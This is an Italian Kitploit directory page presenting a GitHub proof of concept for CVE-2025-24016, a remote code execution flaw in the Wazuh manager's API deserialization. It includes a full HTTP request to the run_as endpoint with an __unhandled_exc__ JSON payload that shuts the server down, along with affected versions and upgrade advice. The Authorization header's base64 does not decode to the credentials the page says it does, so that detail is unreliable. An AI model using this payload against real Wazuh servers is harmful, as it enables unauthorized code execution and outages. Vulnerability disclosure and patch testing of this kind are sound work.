Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE nel server Wazuh! Esecuzione di codice in remoto | Kitploit
Strumenti/GitHubGitHub/glostarrx1/cve-2025-24016
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE nel server Wazuh! Esecuzione di codice in remoto

Vedi Repository
161 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

Wazuh Esecuzione di codice remoto (RCE) - PoC

Panoramica della vulnerabilità

Questo repository dimostra la vulnerabilità di esecuzione di codice remoto (RCE) nel server Wazuh, introdotta da una deserializzazione non sicura nel pacchetto wazuh-manager. La vulnerabilità consente ad attaccanti remoti con accesso all'API (dashboard compromessa, server Wazuh nel cluster o determinate configurazioni con agenti compromessi) di eseguire codice arbitrario sul server.

Versioni interessate

  • wazuh-manager versione >= 4.4.0
  • Corretta nella versione >= 4.9.1

Descrizione

La vulnerabilità risiede nell'API Wazuh, dove i parametri del DistributedAPI vengono serializzati come JSON e deserializzati utilizzando as_wazuh_object nel file framework/wazuh/core/cluster/common.py. Un attaccante può sfruttare questa vulnerabilità iniettando un dizionario non sanificato nelle richieste DAPI, che può portare alla valutazione di codice Python arbitrario.

La RCE può essere innescata tramite l'endpoint run_as, che consente all'attaccante di controllare l'argomento auth_context. Creando una richiesta dannosa, è possibile eseguire codice arbitrario sul server master.

Prova di concetto

Per innescare questa vulnerabilità tramite l'API del server, seguire i passaggi seguenti.

Richiesta Burp Suite del PoC

  1. Richiesta Burp Suite per innescare la vulnerabilità:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Immagine della soluzione

  1. Spiegazione della richiesta:
  • Intestazione Authorization: si tratta dell'autorizzazione codificata in base64 (wazuh-wui:MyS3cr37P450r.*-).
  • Payload: il payload dannoso contiene l'eccezione non sanificata __unhandled_exc__, che innesca l'esecuzione di codice Python arbitrario (exit in questo caso).

Impatto

  • Esecuzione di codice remoto (RCE): questa vulnerabilità consente agli attaccanti di eseguire codice arbitrario sul server Wazuh, interessando le versioni >= 4.4.0 fino alla 4.9.0 (non ancora corretta).
  • Potenziale denial of service: in questa PoC, viene attivata la funzione exit, causando lo spegnimento del server Wazuh.

Mitigazione

Per proteggere i tuoi sistemi, aggiorna a Wazuh versione >= 4.9.1 in cui questo problema è stato corretto.

Scarica lo strumento